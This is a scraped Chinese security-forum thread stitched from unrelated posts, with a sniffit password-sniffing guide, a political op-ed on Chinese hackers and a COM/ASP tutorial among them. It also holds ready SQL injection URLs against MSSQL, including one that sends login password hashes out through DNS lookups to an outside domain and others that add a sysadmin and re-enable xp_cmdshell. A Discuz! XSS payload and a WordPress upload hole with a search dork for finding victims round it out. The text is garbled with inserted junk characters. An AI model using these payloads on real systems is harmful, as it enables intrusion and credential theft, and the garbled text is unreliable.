最近看过此主题的会员

返回列表 发帖

[人才招聘] [招聘] 人人网招聘安全工程师

提示: 作者被禁止或删除 内容自动屏蔽
非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:vini5发表,本帖发表者vini5符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者vini5和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

Sniffit常见问题及防范策略分析<br>1. sniffit 既是个优秀的管理工具也是个危险的侵入工具。可被管理员用来检查网络中到底传输了些什么,学习各种tcp/ip协议的工作方法,也能被攻击者利用,主要是记录密码。
8 s. h5 I2 p. _' L<P></P>2 V1 X+ |* V: N+ Z  w1 R
<P>  2. 工作原理: 为什么能检查密码和不是传送给自己的数据呢? </P>
4 {. }0 R& n8 w# V5 }$ ~: L$ f<P>  在典型的LAN环境中,(指共享式HUB上连接的两个用户A和B),基于共享式HUB的工作原理,用户A发出的所有tcp/ip请求在HUB的每个端口上广播,正常情况下,B不接收这些目标地址不是自己的数据,但是一旦我们在B机上运行sniffit一类的监听工具,就能置网卡于第三种叫混杂模式的状态下(前两种为tcp,udp模式),在该状态下,网卡接受所有的数据,不管是发给自己的,还是不发给自己的,都被网卡接收并直接传给最上层应用层,交由相应的软件如sniffit处理。 </P>
" ^- Q& q6 u: I<P>  3。常见用法 </P>0 K: `7 {& D/ i5 t" O
<P>  a. 检测telnet/ftp/pop3密码: </P>
4 z8 z' \7 ~. `! m+ r<P>  #sniffit -a -A. -p 23 -b -t 192.168.11.@ </P>
3 ^1 F# i9 X+ S6 b<P>  #sniffit -a -A. -p 110 -b -t 192.168.11.1 (pop3 server) </P>
! x# ]$ r* |( _; V7 x* t! f5 v<P>  b. 查看http头信息 </P>
8 y0 b) z. b% }<P>  #sniffit -a -A. -p 80 -b -s 1.2.3.4 (1.2.3.4是防火墙外部地址) </P>
& J. S! ]; b+ K2 R  m<P>  c. 记录输出到文件 </P>! L& w3 O. I( C: K6 D, X
<P>  #sniffit -p 21 -l 0 -b -s 192.168.11.2 </P>
' }  ]: L' W9 M0 ^<P>  d. 查看icmp消息 </P>
0 S6 ^) s1 ?; o4 ?( @<P>  #sniffit -p icmp -b -s 192.168.1.2 </P>2 ~# D+ s5 A6 ~8 Y: e  V8 ~0 M5 t
<P>  e. 交互式界面 </P>
/ z1 `8 f3 ~6 x6 G! s9 q<P>  #sniffit -i </P>
' \- Z/ J/ j" k4 Z, Y8 F<P>  f. 检查本网段内发出名字广播的机器 </P>
1 E3 U6 U) Z8 i& E! `! ~  |<P>  #sniffit -a -A. -P udp -p 137 -b -s 192.168.11.255 </P>
9 @" t. Y' u4 k3 D2 I<P>  g. 注意防火墙的情况 </P>. T6 n9 v2 E& F, Y, P
<P>  若要检查防火墙内部网卡上的包eth1,可能你要设置 -F eth1参数,因为默认地sniffit 假设为eth0 ) </P>
* `# ^! J1 K0 z<P>  4.哪些信息是敏感的和易被检测的? </P>: Y% e$ e! Y% G
<P>  telnet/ftp/pop3的密码都是明文传送的,都是易被检测的,apache的基本方式的用户名/密码认证也是UU编码后的口令,也是易被检测的。 </P>, x( _% n& z4 U8 T* D
<P>  5. 怎样阻止? </P>6 n; [4 f- r; }2 L8 e( ~
<P>  硬件: 不要用普通的共享式HUB,用交换机来代替它,目前只有交换机和路由器能阻止sniffit的作用 </P>+ W: o5 E  X: p/ f2 N
<P>  软件: 用带加密功能的tcp/ip连接,象ssh/scp全面代替telnet/ftp/pop3,用MD5方式的apache认证 </P>! N2 m' R# }$ W) _, s; c- {6 d
<P>  6。作用范围: </P>
, ~! t, E/ m# F" d$ R6 n/ a<P>  仅在逻辑子网内有效,不能跨子网,因为广播不被路由器传递,但若是在服务器上运行sniffit,则任何方法均无效,对防火墙来说,通常sniffit攻击是第二层攻击,就是先得到一个普通帐号进入再探寻更多 </P>
- B* c. f# o5 G9 b) Z" y7 n4 x<P>  7. 怎样判断是否有人在用sniffit? </P>
9 q% I1 Y% n  X: h% p* D: F4 Y) }<P>  可检测网络接口(ifconfig)看是否处于混杂模式来确认是否被侵入并安装了sniffit,只限本机。<BR></P>
2 L7 f$ V1 n, w0 j0 _- Z5 _) W
3 d) k1 W) Q9 k! M( G8 s" g$ `" i$ O5 p3 \

; S, f1 B3 z7 t; T" o7 D' j
" W3 _2 K0 [5 I; U, V* D
4 |: i" {4 D8 d/ V' Q% D! C, v! o* m7 e/ g3 H

. b8 o' t) s! U1 a, i  n$ S
* V  d% e, q" v2 b5 Q/ U/ J9 c
) L5 r/ v" F% j: @, W- H2 J. b: g3 `. P/ }4 N' \1 i/ m- x

) L$ k4 j0 z- r/ v
; J* W$ _5 r  r: g: Z
. U! }8 \: z. Y+ w1 S7 f! p
' Z) [+ T& v" H) b# Q" V9 A7 ]1 U! N
6 H! L3 U- e4 Q. {. p6 S4 @7 B( e0 s

3 f  m% a# N# L, y: Y6 M- l, Q$ c* R- f3 Z/ u& Q: T
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

mickey:Advanced SQL Injection学习笔记
1.
3 r3 O. P' z0 G1 ?inband(基于错误回显)7 Q  t) z1 H, }5 S
http://victim/page.asp?id=1 or 1=convert(int,(USER)))–
, v, X9 `& p7 [. l# Ihttp://victim/page.asp?id=1 or 1=convert(int,(@@servername)))–
5 l$ X& k; t3 E) P4 N) chttp://victim/page.asp?id=1 or 1=convert(int,(@@version)))–  `% p7 T8 F/ K+ B
http://victim/page.asp?id=1 or 1 in (select db_name(5))–

8 m/ {, y8 W; s$ X
out-of-band(通过dns)
6 a0 Z6 u- M9 |0 h- fhttp://victim/page.asp?id=1;declare @host varchar(800);select @host=name+’-'+master.sys.fn_varbintohexstr(password_hash)+’.sql.pentest.cc’ from sys.sql_logins;exec(‘xp_fileexist “\’+@host+’c$oot.ini”‘);–

5 T4 G+ ~9 C, ^0 ~( r) Q; n" }+ z9 N
bind sql injection

5 x0 n7 F$ f! l. @$ i  I& ~. x
http://victim/page.asp?id=1;if+not(select+system_user)+<>’sa’+waitfor+delay+’0:0:5′–
" `" o5 Q' K! j6 _; H+ y
2.9 n- r% s4 ?* m' l9 H" c
http://victim/page.asp?id=1 having 1=1–   整型注入8 ^6 y) I4 U% I/ T% _: X2 R6 i$ [' J
http://victim/page.asp?id=1′ having 1=1–  字符型注入
4 @9 b7 e3 G3 ~' H" U- J
3.7 e* L7 b$ ?5 t. l" q* H7 J$ G
http://victim/page.asp?id=1;select * from openrowset(‘SQLOLEDB’,”;’sa’;'mickey’,'waitfor delay “0:0:50″,select 1;’);&amp;a=1  (暴力猜解SA密码)
* K) e  G4 U" [9 `& q
http://victim/page.asp?id=1;select * from openrowset(‘SQLOLEDB’,”;’sa’;'mickey’,'exec master..sp_addsrvrolemember “sa”,”sysadmin”;select 1′);&amp;a=1 (添加当前用户到sysadmin组)

3 v4 g. r+ w- P1 g1 X% c
http://victim/page.asp?id=1;select * from OPENROWSET(‘SQLOLEDB’,”;’sa’;'j0e’,’select  1;exec master..sp_dropextendedproc ”xp_cmdshell”;’)&amp;a=1
  R  B9 r) s, C% k9 l. vhttp://victim/page.asp?id=1;select * from OPENROWSET(‘SQLOLEDB’,”;’sa’;'j0e’,’select 1;DECLARE @result int,@OLEResult int,@RunResult int,@ShellID int EXECUTE @OLEResult=sp_OACreate ”WScript.Shell”,@ShellID OUT IF @OLEResult<>0 SELECT @result=@OLEResult IF @OLEResult<>0 RAISERROR(”CreateObject %0X”,14,1,@OLEResult) EXECUTE @OLEResult=sp_OAMethod @ShellID,”Run”,Null,”ping -n 8 127.0.0.1”,0,1IF @OLEResult<>0 SELECT @result=@OLEResult IF @OLEResult<>0 RAISERROR (”Run %0X”,14,1,@OLEResult) EXECUTE @OLEResult=sp_OADestroy @ShellID’);&amp;a=1 (sql server 2000重新构造xp_cmdshell的方法)

' ]% }9 _; W9 E$ q# g
http://[site]/page.asp?id=1;select * from OPENROWSET(‘SQLOLEDB’,”;’sa’;'j0e’,’select 1;exec master..sp_configure ‘’show advanced options”,1;reconfigure;exec* @) r3 c# l) @+ k
master..sp_configure ”xp_cmdshell”,1;reconfigure’)&amp;a=1  ?! d2 c6 n- L3 {6 p
http://[site]/page.asp?id=1;exec master..sp_configure ’show advanced options’,1;reconfigure;exec master..sp_configure ‘ole automation procedures’,1;reconfigure;&amp;a=1(sql server 2005重新构造xp_cmdshell的方法)
* n& b  o: G1 R( C! p0 C* Q
4.
* Y: a% a( A. ]. Z: g5 d9 K3 W( T# b( z使用URL编码和在注释中加入任意字符来绕过IDS
# ]! Q9 j: U! M6 U/ ]  F7 @9 x( l  @
http://[site]/page.asp?id=2%20or%202%20in%20(/*IDS*/%73/*evasion*/%65/*is*/%6C/*easy*/%65/*just*/%63/*ask*/%74/*j0e*/%20%75/*to*/%73/*teach*/%65/*you*/%72/*how*/)%2D%2D
, j& b4 H. @+ e* Q& ^0 I! q

9 K: f+ ]" R. x9 |0 @/ B
. ?2 ^6 C7 u# m4 f5 k; Q7 S7 t
' }5 e8 a% T% C  _$ p  y
2 Y2 V. x+ W% t, l% n8 v. m
  _# b0 o; g7 P  j  t, p% ~/ `
1 H% ]3 _  O! O% i& W! N. c8 K
. S2 V" J5 ?# A8 [$ a# V. B3 ]% p; P( H# b, |* t) m: E
# v% }0 M3 ]4 R

# g# X6 k# ~1 h4 S5 k  [
" e5 r6 A$ M# r: R  }3 N, `7 r7 r: H2 `5 |' t

0 S9 l. ]# ]) b, j9 z8 G3 }6 g; o6 ?  B. e7 D; y: ~) w
5 K, @# O8 M% g

* r5 J' i  t. d' f  d' T" l
( `! j# b1 k! d2 j
5 q2 W: V" V+ y% V
9 Q* {, w# j, G1 e. K公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

中国黑客缘何被关注
郑若麟 (巴黎)资深媒体人   最近一段时间以来,有关中国“黑客”的报道甚嚣尘上,令人难以置信。耐人寻味的,不是“黑客”本身;中国和所有互联网发展迅猛的国家一样,都会出现黑客之类的网络“异类”,都会存在网络犯罪行为。中国存在着“黑客”,就好像中国人也会感冒一样,没有丝毫值得大惊小怪的。但为何中国的黑客就如此受到国际媒体的“关照”呢?其背景和目的究竟是什么?这无疑是值得我们思考的。
& }/ c# @# X: K+ d3 N" t$ V
  这次“黑客风潮”是从德国《明镜》周刊开始的。那是在8月底。《明镜》周刊声称从“可靠消息来源”获悉,中国黑客入侵了德国总理府,并以很大篇幅详细报道中国“黑客”是如何向德国有关机构网络植入“木马”软件,以窃取甚至“控制”德国网络的。紧接着,9月4日,英国《金融时报》又“根据美国五角大楼的匿名消息”来源称,“中国人民解放军的黑客入侵了五角大楼”。《泰晤士报》更是捕风捉影地说,中国入侵五角大楼是为了“控制美国航母系统”。更令人难以置信的是,9月5日,英国《卫报》说,“中国黑客入侵英国政府系统”,好像中国黑客与美、德“为敌”还不够,还要加上英国。三天后,历来“不甘落后”的法国也加入这一“大合唱”:《世界报》引用法国国防部秘书长德龙的话说,中国黑客“入侵法国政府电脑系统”……给人感觉是,似乎这些媒体都在比“谁从阿Q身上抓到的跳蚤更大、咬上一口更响”!
- ]/ c$ m: R6 A, b7 n
  一时间,全球网络大有被中国黑客“全面入侵和控制”的态势,给人的感觉真是“仿佛天空在燃烧”、“大战正在虚拟世界激烈地进行之中”……如果是不入流小报的报道,倒不必给予太多关注,至多作为茶余饭后的消遣话题。然而这些媒体都是西方各国的一流“正经”报刊,这就不能不令人吃惊了。

3 S0 g/ a* b6 H: g+ o" z. C
  仔细研读这些报道时,可以发现欧美官方与媒体说辞上三个非常明确的差异:一是各国官方大多对此保持低调或沉默,各国媒体则以高调、密集型轰炸式来报道;二是各国官方或表示“入侵源是中国的某个网站”,或称“有可能来源于中国”,但没有人敢于认定是中国政府或军队所为;但西方媒体则根本就用“中国军方入侵美国五角大楼”这样的从严格意义上来说是误导性的、甚至是错误的标题;三是没有任何一个国家的官方表示遭到入侵的网站拥有保密内容或国家机密遭到非法盗窃,而媒体则相反,大肆渲染“大量机密被窃”、“国家损失惨重”等耸人听闻的消息。

& n% O# b& W0 Q. Y3 e( L6 _9 h
  由此三个差异,就可以看出,这是一场蓄意谋划的恶毒诽谤和攻击,与事实没有任何关联。之所以欧美官方低调处理,是因为他们心里很清楚,并不存在“中国黑客大肆攻击西方各国”的事实。法国国际战略分析研究所所长杰雷在接受我一次采访时说,每天攻击五角大楼的黑客事件高达数千起,而且绝大部分来源于美国自身的黑客,怎么能够将区区一点来自中国黑客的攻击,就渲染成“世界大战”呢?更何况,所谓中国黑客的攻击也是没有事实根据的。
1 g+ o& v7 j* g: V9 @  Z
  那么为何会出现这样一种明显的抹黑行动,而且全球一致、协调行动呢?孤立地看,德国《明镜》选择了默克尔访华前夕、入侵五角大楼消息的披露是在布什与胡锦涛会晤前夕……似乎都是“偶然”的。然而实质上却与近年来国际上一小撮对中国高速发展感到“威胁”的某些势力对中国的“围剿”是一致的。对中国形象“抹黑”的战略是其中一个重要组成部分,从一个领域到另一个领域,几乎没有遗漏。其核心,是想摧毁中国近三十年来通过经济高速发展和社会进步而在国内特别是国际上重塑的“中国模式”所带来的所谓“北京共识”。这一共识已经成为当今世界发展模式的一个范本。

, g( x9 O) s: {$ Y5 Q, h
  冷战结束后,世界上除了少数发达国家周边的东欧国家外,大多数国家并未在“华盛顿共识”下获得“冷战胜利红利”。特别是非洲国家,今天非洲国家更多的接受的,恰恰是“北京共识”。如果中国模式在世界其他地区大量被“复制”的话,将对现存国际体系形成某种冲击。由此来看,这股“黑客风潮”并非偶然。用杰雷的说法,不仅并非偶然,而且还是一个预兆:我们还将看到其他形形色色的各类“风潮”,特别是在北京奥运前夕……

* u6 z" e4 E! \& s  M( [( T# C! _
  仅此而已,岂有他哉?

/ C3 l1 B6 e' c9 c) ?+ v* C' z; R
  h  R4 _8 ~3 G4 _) C& s

& P, c; ?, e7 ~$ w& |
9 @! ~6 D" z" A, a5 h3 h1 c  M7 w$ I5 D9 V3 ]1 J/ c+ ]
7 k/ P2 C% }$ a  H. r

# a$ h  u0 G. ^( G. a9 h, R+ S  C# [# T
; K4 ?9 Q/ ]  x, _
8 E& K# K% K/ V1 n9 J) s' {
7 T4 ?, @7 s2 _5 Y, k- w& W$ P
: _% e# w! b) }# }
1 R  e4 E9 o. M+ Z, D9 C
" m; j/ @) n  l8 f' T! r0 E

- k; `7 T' F% a- |8 K+ U  X$ m
0 [+ N; P; i. G. {9 a" w8 g% o% ^' |3 ?! L
* u  O/ b/ M- g9 ~  `2 V9 {
% I5 \8 j1 ^- J( ^

5 m6 v0 J9 c8 q* {- }& o1 w公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Discuz!通用版本触发事件xss bug
触发事件xss 利用机会不高$ k6 a4 t; l( }" a
由于Discuz!的1_modcp_editpost.tpl.php里$orig['message']未过滤,导致一个XSS漏洞. 一 分析 在文件1_modcp_editpost.tpl.php里代码: .....<? } elseif($action == 'editmessage') { ?><textarea type="text" id="message_<?=$pid?>" name="message_<?=$pid?>" style="width: 80%; height: 200px; overflow: visible" ondblclick="doane(event)"><?=$orig['message']?></textarea><p style="margin: 5px; text-align: center;"><button type="button" value="true" class="submit" onclick="submitmessage('<?=$pid?>');this.disabled=true">提交</button>  <button type="button" class="submit" onclick="ajaxget('modcp.php?action=editmessage&amp;pid=<?=$pid?>&amp;tid=<?=$tid?>&amp;editmessagesubmit=yes&amp;inajax=1&amp;do=notupdate', 'postmessage_<?=$pid?>')">取消</button></p><script type="text/javascript">......<?=$orig['message']?>没有过滤导致xss. 进入以上的代码的有2处: 1. 1_viewthread.tpl.php里: 00278: <td class="postcontent" <? if($forum['ismoderator'] &amp;&amp; ($thread['digest'] >= 0 || !$post['first'])) { ?> ondblclick="ajaxget('modcp.php?action=editmessage&amp;pid=<?=$post['pid']?>&amp;tid=<?=$post['tid']?>', 'postmessage_<?=$post['pid']?>')"<? } ?>>00279: <div class="postinfo">通过ondblclick事件触发ajaxget去访问. 2. Beijing2008forumdisplay.htm 00224: </td>00225: <th class="$thread[folder]" {if $forum['ismoderator']} ondblclick="ajaxget('modcp.php?action=editsubject&amp;tid=$thread[tid]', 'thread_$thread[tid]', 'specialposts');doane(event);"{/if}>00226: <label>同上下面的利用是用的1_viewthread.tpl.php里的方法. 二 利用 步骤: 1.发表新贴 ->帖子内容:<script>alert('www.sitedir.com.cn')</script> 2.对帖子有管理权限的用户"双击"讨论帖进入便捷编辑模式,将触发XSS. 三 补丁[fix] 缺 " x6 _) `* @8 \* \
- X  t, i2 S& `# R7 c

, a( n4 b0 y( v" k0 L  ?4 n" Z! D9 r# d, ]$ j
; v( S, ~6 y4 F* ~

9 M2 j  e" K8 @* ~& S  E0 j+ b2 c  D# I) q
3 K; Q8 G' h0 Q. E3 m7 r8 c

' Y9 V4 n- x: _4 Y. z! V
" j& E/ {8 Y* J- s/ j$ x' u& O5 E$ k! h9 X: I' ~- F
) {( v) S. {# e

$ U, ?' ?6 Q8 ^: V8 \, A' h* |% x" D" R6 Y0 H0 V- ~8 B7 T) `6 n( b2 t
: z0 {8 ?9 u0 j  f% \5 {( k- E
! Q* [7 S2 ^; v+ V  ?
3 {8 u) c+ V4 d& q7 S! L+ [( H3 a5 Y

1 J! r8 g$ u5 E: t9 d8 a
& H% B5 l& ~/ _- B公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

COM编程模型
概述如果你用ASP做开发, 你可能已经在你的ASP页面中用过COM了.但是,在你自己开发一个COM部件或阅读一本详细介绍COM的书之前,你很可能并没有完全理解COM,因而不能充分利用它来创建你的ASP页面.同时,你也不能很好的理解那些随COM部件带来的使用文档.如果你知道COM的标准和限制,你就可以很快的学会开发其他的COM部件.在这个教程里,我们将学到COM是怎样工作的,你还将学到精通COM的知识.

0 m5 K. j, n9 Y) U0 c  b- ~5 `
本教程的读者本教程将给那些已经使用过VBscript 语言的,特别是用过ADO但是不知道那就是COM的人详细描述COM模型.他将告诉你:
2 H0 t* D# \3 m: D
1.属性和方法的区别2.属性需要参数吗3.只读属性是什么意思4.什么是集合对象5.每个集合对象都有些什么属性6.不调用方法如何对集合排序7.在一个DLL中可以有多少个COM部件.
+ ]1 f8 K; \# j3 Q. X0 H, @2 q# u
基础知识COM是一个对象接口的标准.定义一个COM对象只需要定义方法和属性,没有其他的接口.从一个程序员的观点来看,属性和方法之间没有太大的区别.方法可以带参数,属性不能.属性可以读写,方法如果要返回值的话,是只读的.

8 m7 \5 d: P9 A
尽管从编程角度看,属性和方法没有太大的区别,但是部件开发者用他们完成不同的功能.属性通常代表一个对象的状态,但是调用方法可以完成任何想完成的任务,不管他包含对象的状态与否.

- x6 B" O2 {" d" p+ P' S% ?' E& ?
属性属性不需要参数,用来描述或设置对象的状态.所有的属性返回一个值,有些属性是只读的,有些是可读可写的.下面是VBscript中读取属性的表达式例:

  F9 v8 z( K7 `4 G! U) x
例 1:

8 R  z0 w' l; e+ v. D
value = object.property

3 J% q1 X  K! R7 h
注意这里没有用括号.例二是设置属性例:
! s8 @# @4 c6 a, [- H7 P* A
例 2:

2 b  @) W# d: F  e/ R- W
object.property = value

+ p3 X. h  O1 g4 m1 {. [
方法方法可以带参数,可以返回值.通常用来初始化一个对象的事件.当给方法传递参数时,方法可以用来设置值.如果方法只返回值,不设置值的话,表达式如下:

" Y, ~: L1 u1 j( O
例 3:
. j1 g; G  N' C5 \
value = object.method()

* C! g+ m7 a9 G, d& t
注意例3中用了括号.调用方法来返回值时必须用括号.例如,对象Connection有一个Execute方法返回一个Recordset对象.例:

# g: x" D. u) }
例 4:

- j, p. a4 d( ~9 B
Set RS = Conn.Execute("SELECT * FROM TABLE")
! p5 R6 k1 t! Y" h) s
不用返回值,不用参数的方法,如Connection对象的Close方法:
# r* Z4 V3 B$ t  T8 E+ k
例 5:
% |  R# Z0 V) I6 z/ L' d
Conn.Close

1 Z6 l: `) r2 |9 Z8 A& a
参数方法可以带一个或多个参数,或一个也不要.但是,参数并不是必需的. 一旦一个参数是可选的,其后的参数都是可选的.例如,参数一和参数二是必需的,参数三是可选的,则参数四必定是可选的.一个很好的例子是Connection对象的Open方法.他有八个可选的参数.前三个用来传递数据库和等录的信息.你可以像例6那样调用Open方法:
* H2 O1 H* Z# _0 u6 n/ p# l
例 6:

9 c; Y" I4 T# d2 T0 l
Conn.Open "DSN","sa",""

  h! L6 I3 U$ a
为了提供DSN名,用户名,口令为空,你也可以想例7那样调用:

2 k# \( _( V: ^4 n/ n4 |
例 7:

3 i6 T  L) D' J) o0 `# d
Conn.Open "driver=SQL Server;server=yourServerName;uid=someUID;" &amp;_"pwd=somePWD;database=someDatabase;"
7 N. E, @; j: B; P7 X
注意在例6中我们用了三个参数,在例7中只用了一个,结果是一样的.

; U, y# ~0 N" P, \5 _6 q1 p
调用方法时,以逗号分隔,让可选的参数空着,将给该参数传递空值,在例6中,可选参数用缺省值,在例八中用空值.
: s. a: @1 Y: I
例 8:

9 m% I9 z( E0 o  g" U* p. ~4 z2 W+ C
Conn.Open "DSN","sa","", , , ,

8 Q  \- P5 L/ t( g+ g* ?( f
集合集合是本身包含了许多对象的对象集,所有的集合都包含一些预定义的方法和属性.一个集合有一个Item方法,一个Count属性,一个 _NewEnum方法.集合有建立类型与他相同的对象的能力.换句话说,如果一个对象可以被包含进一个集合中,那么,哎,这句话好难,我不翻了,给出原文吧.( In other words, if a particular object can be group in a set then that object will have a collection object that can create an instance of an object within the set. For instance, a Drives collection object will contain a set of drives that might represent all the drives on a particular computer).
. C9 w! d# O! Q, C! h0 g
Count属性返回一个代表集合中元素个数的长整型值.给Item方法传递一个长整数(当然应在1和Count之间),就返回集合中这个索引所指向的对象.就像数组那样.(原文此处混乱,稍做调整)

, _) y1 d2 S4 _+ U
例 9(1):
2 ~1 D- T3 f* m
Set Object = Collection.Item(2)

3 K: Y1 x+ Z9 b* m+ S5 z0 G* h! Z/ f
因为Item是缺省方法,所以你也可以如下调用:
4 U7 c+ h0 J# [; R' c: [
例 9(2):

9 m2 c/ |& j: v* D0 y9 W4 W  G
Set Object = Collection(2)

" L7 J# N8 Q& J# ?4 z% I

; `9 m: z5 ]+ s* l- O/ T# F
_NewEnum 方法可以反复调用,
6 ^- w- C8 |# [; x6 t+ X$ ^
例 9:

% O% }* m) e. S8 {4 U
For Each Object in Collection

% K; W; u6 ~( ]" {
Next Object
) p1 F# D7 O- L
(以下不译)Notice that the _NewEnum method is not referenced within the syntax of the statement in example 6. This is because the _NewEnum method has a special index that Visual Basic recognizes as being used for the For Next statement. As a little background, all methods and properties in a COM object are indexed and certain indexes are used for particular tasks. For example the zero index is used for the default method or property. The Default Method or PropertyThe method or property that has the COM index of zero is called the default property. Visual Basic allows the programmer to not use the regular method/property syntax when calling the default value, you can leave the syntactical call to the method/property off all together. For example, the default method in all collections is the Item method. If you where going to call the Item method, you could do it like it in example 9.

2 Z' d. {: X) G8 C* X$ D  F! s" U) `

6 _/ E; a: P* T* j: _
为了在ASP中建立一个COM对象,你可以:
9 U: c7 U, a4 ]' O( U5 i
例 11:

7 e# a6 P: c2 q+ L/ o# t0 n! T) f
Set Object Server.CreateObject("SMUM.XCheck.1")
& U& T6 |! v/ s
给Server的CreateObject方法只传递了一个参数,就是一个ID值,这是一个由COM部件提供者给出的,唯一地标识一个COM对象的符号.为了创建一个COM对象的实例,你必须知道该对象的ID值.
# X8 p" l, f& \8 ]1 X' J
有另外一种方法可以获得一个对象的实例,你可以用一个已经存在的对象实例来创建一个新的对象实例,事实上使用集合时就是这样工作的,你调用Item方法,返回了一个对象实例.
  v  S3 C$ N9 i' ?3 c8 U8 F" B; A
例 12:

. y3 n1 c" D( R% U9 F
Set Object = Collection.Item(2)
2 D4 `7 \7 k. M8 p
例11和例12有一点是一样的,那就是都是从别的对象创建对象,区别是,CreateObject可以创建任何类型的对象,而Item只能返回集合中的对象.就像先有鸡,还是先有蛋的问题一样,你可能要问,Server对象又是怎么来的呢?事实上,这是内置对象.他存在于ASP当中.
% A7 f' G7 v  s, i
内置对象ASP中有六个内置对象,他们是:Server Request Response ObjectContext Application Session 这些对象与其他对象唯一不同的是,不需要创建实例.他们与其他对象表现得一样,有自己的方法和属性.因为他们是内置的,所以你不需知道他们的ID,事实上,你根本不需调用CreateObject去创建他们.

& Y  V2 Q% j8 B4 l
对象ID如果你创建对象的主要方法就是调用 CreateObject 的话,知道对象的ID就非常重要了COM部件提供者在他们的文档里回提供对象的ID的.

8 h8 g" k4 @1 x& A8 F! ?/ C2 O
(以下不译)The DocumentationNow that we have established the understanding between methods and properties along with their different attributes, we need to understand how the documentation for the objects represents these attributes. For examples, we are going to look at 15 Seconds' component section, which is in the same format as the IIS 4.0 component documentation. Read and Write PropertiesA good example of a read/write property is that of the PhoneTranslate property of the XCheck object, shown here in example 11:
+ @* _( Q0 D+ y% E/ A6 f# n
Example 13 object.PhoneTranslate[= value] Notice the value syntax, this is the indication of a property that can be written to. The brackets denote that the property is optional, in other words you do not need to set the property to use the object. Click here to view the full documentation. Read Only PropertiesA good example of a read only property is the Expires property of the ASPMail object.

% L+ V. h/ Z5 I; J" H7 l
Example 14 object.Expires Notice that unlike example 11 there is not an equal symbol, indicating this is read only. Click here to view the full documentation. Optional Method ArgumentsA good example of the optional arguments is the SendX method of the OCXMail object. The documentation syntax can be seen here in example 12:
- w- U& @# ^9 I5 F1 J/ A9 o' m
Example 12 object.SendX(mailserver[, fromName[, fromAddress[, priority[, returnReceipt[, toAddressList[, ccAddressList[, bccAddressList[, attach[, messageSubject[, messageText]]]]]]]]]]) Notice that the only required argument is the mailserver argument. All the rest, noted by the brackets are optional. Click here to view the full documentation. SummaryWith a fundamental understanding of COM and it's abilities, coupled with good documentation you can expand the flexibility of your Active Server page programming. Take the information that you already know about programming IIS objects, like Session objects and ADO, and expand on that by adding more COM objects to your repertoire. Third party COM object will allow you to expand your Active server applications and accomplish tasks rapidly by leveraging the component object model.

4 i; T& N9 ^; G$ c
  c( T+ Z% W4 f: k$ a- N  [* a2 Y7 w9 z8 d) Z0 g5 R9 M
; u" L. {- M+ c& H# A( v$ S2 _2 I
7 C. m, R6 {* W
: T0 r. c+ ^% W# z; n
4 C4 h$ Z2 P- ?! _/ e6 t: C

% o" `6 S( r9 m: m
! P" U; U( x8 F" f# p5 v* \, S( _1 [  u4 y
5 E# J( H- {* o+ v3 e

# |6 e% g+ u, W* r+ ^- H; I% w& \
  O' T1 s  i' z# Y' [  C, |! u! Z; F# D; x+ l1 V: g  V

* {( v; ]; `  w- q
* {' t; P0 u, }( E' F0 [8 f
" p, Q0 ^6 m+ S/ v- m5 J* {/ R2 O5 _6 U
3 f9 R, }' Q( }$ v
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

WordPress插件EditorMonkey上传漏洞
WordPress插件EditorMonkey存在上传漏洞。用WINDOWS2003, ^; G2 Z, D% \3 ?; P4 q3 m

" Y2 J; P7 t' ?' \. n+ x, G系统的请注意哦。这漏洞也就是fckeditor的上传洞。: Z! Q- }) n' E2 V" r
漏洞测试如下:
1 y! O; b, l; s7 \: |1 {" h
3 i6 ]- F1 ~8 n+ G# X* _3 r8 Z/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/test.html ( Y% i- X4 N! j. J

$ Q$ D' j5 y+ s( h上传什么文件大家多懂的。上传后文件在/UserFiles/你的文件名
+ [$ c* B' x7 w) [: l! s7 ?
2 P3 ?1 c  n8 H1 X% Y" Q谷歌搜索一下,好多用这插件的博客。
7 }9 f3 B2 |/ Z4 | 9 F- W) G3 L+ _* ]/ N0 {8 g
关键字:wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/test.html8 R6 m4 T" A, ]  i( a3 W6 z
. z0 }; ~0 f" h4 g! K& B6 [

: Z* N7 ~4 [' W% X( J! f. H: D- f& ]& e0 M% B

5 \% o3 O' O4 r% w2 t# \8 r1 t  v# ^) ~8 Y
. L6 y% X" _0 I0 T% _" s
" t; M/ @2 ]( i8 W
* a  Z2 b' p2 Q' p5 W9 e

* k8 z! l' z# L) D2 \
# H+ X$ d; n- y
* a2 Y/ y. m" Y6 ?6 s  L! ]1 \1 v/ K, K4 c( e  T
/ s! O4 w& S+ i7 r0 Y4 T( [, b5 e
2 `- Y+ {8 t; J. d; D, D
, x0 Q: I7 l4 P6 n- Y) X( X; ^4 _: Q0 s

8 I7 Y, i4 s4 Z/ ~
7 Q) \: Z( A4 d' m+ e$ I% k  A. o  I/ z; |0 P: O6 y7 v
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

CSS挂马防范
